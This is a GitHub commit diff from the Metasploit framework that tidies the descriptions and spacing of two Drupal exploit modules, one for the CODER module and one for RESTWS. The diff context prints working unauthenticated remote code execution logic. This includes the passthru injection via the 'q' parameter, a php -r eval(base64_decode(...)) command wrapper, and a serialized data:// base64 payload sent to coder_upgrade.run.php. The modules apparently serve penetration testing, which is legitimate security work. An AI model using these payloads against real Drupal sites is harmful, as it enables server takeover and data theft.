Skip to content

Commit 62d28f1

Browse files
committed
Clean up Mehmet modules
1 parent b4846e5 commit 62d28f1

File tree

2 files changed

+19
-11
lines changed

2 files changed

+19
-11
lines changed

modules/exploits/unix/webapp/drupal_coder_exec.rb

Lines changed: 12 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -12,16 +12,17 @@ def initialize(info={})
1212
super(update_info(info,
1313
'Name' => 'Drupal CODER Module Remote Command Execution',
1414
'Description' => %q{
15-
This module exploits a Remote Command Execution vulnerability in
16-
Drupal CODER Module. Unauthenticated users can execute arbitrary command
17-
under the context of the web server user.
15+
This module exploits a Remote Command Execution vulnerability in the
16+
Drupal CODER Module. Unauthenticated users can execute arbitrary
17+
commands under the context of the web server user.
1818
19-
CODER module doesn't sufficiently validate user inputs in a script file
20-
that has the php extension. A malicious unauthenticated user can make
21-
requests directly to this file to execute arbitrary command.
22-
The module does not need to be enabled for this to be exploited
19+
The CODER module doesn't sufficiently validate user inputs in a script
20+
file that has the PHP extension. A malicious unauthenticated user can
21+
make requests directly to this file to execute arbitrary commands.
22+
The module does not need to be enabled for this to be exploited.
2323
24-
This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
24+
This module was tested against CODER 2.5 with Drupal 7.5 installed on
25+
Ubuntu Server.
2526
},
2627
'License' => MSF_LICENSE,
2728
'Author' =>
@@ -64,6 +65,7 @@ def check
6465
'method' => 'GET',
6566
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
6667
)
68+
6769
if res && res.body.include?('file parameter is not setNo path to parameter file')
6870
Exploit::CheckCode::Appears
6971
else
@@ -84,7 +86,9 @@ def exploit
8486
p << ':"-v;'
8587
p << payload.encoded
8688
p << ' #";s:4:"name";s:4:"test";}}}'
89+
8790
payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
91+
8892
send_request_cgi(
8993
'method' => 'GET',
9094
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),

modules/exploits/unix/webapp/drupal_restws_exec.rb

Lines changed: 7 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -12,17 +12,18 @@ def initialize(info={})
1212
super(update_info(info,
1313
'Name' => 'Drupal RESTWS Module Remote PHP Code Execution',
1414
'Description' => %q{
15-
This module exploits a Remote PHP Code Execution vulnerability in
15+
This module exploits a Remote PHP Code Execution vulnerability in the
1616
Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
1717
under the context of the web server user.
1818
1919
RESTWS alters the default page callbacks for entities to provide
2020
additional functionality. A vulnerability in this approach allows
2121
an unauthenticated attacker to send specially crafted requests resulting
2222
in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7
23-
versions are affected by issue.
23+
are affected by this issue.
2424
25-
This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.
25+
This module was tested against RESTWS 2.5 with Drupal 7.5 installed on
26+
Ubuntu Server.
2627
},
2728
'License' => MSF_LICENSE,
2829
'Author' =>
@@ -55,13 +56,15 @@ def initialize(info={})
5556

5657
def check
5758
r = rand_text_alpha(8 + rand(4))
59+
5860
res = send_request_cgi(
5961
'method' => 'GET',
6062
'uri' => normalize_uri(target_uri.path, 'index.php'),
6163
'vars_get' => {
6264
'q' => "taxonomy_vocabulary//passthru/echo #{r}"
6365
}
6466
)
67+
6568
if res && res.body.include?(r)
6669
Exploit::CheckCode::Vulnerable
6770
else
@@ -71,6 +74,7 @@ def check
7174

7275
def exploit
7376
cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
77+
7478
send_request_cgi(
7579
'method' => 'GET',
7680
'uri' => normalize_uri(target_uri.path, 'index.php'),

0 commit comments

Comments
 (0)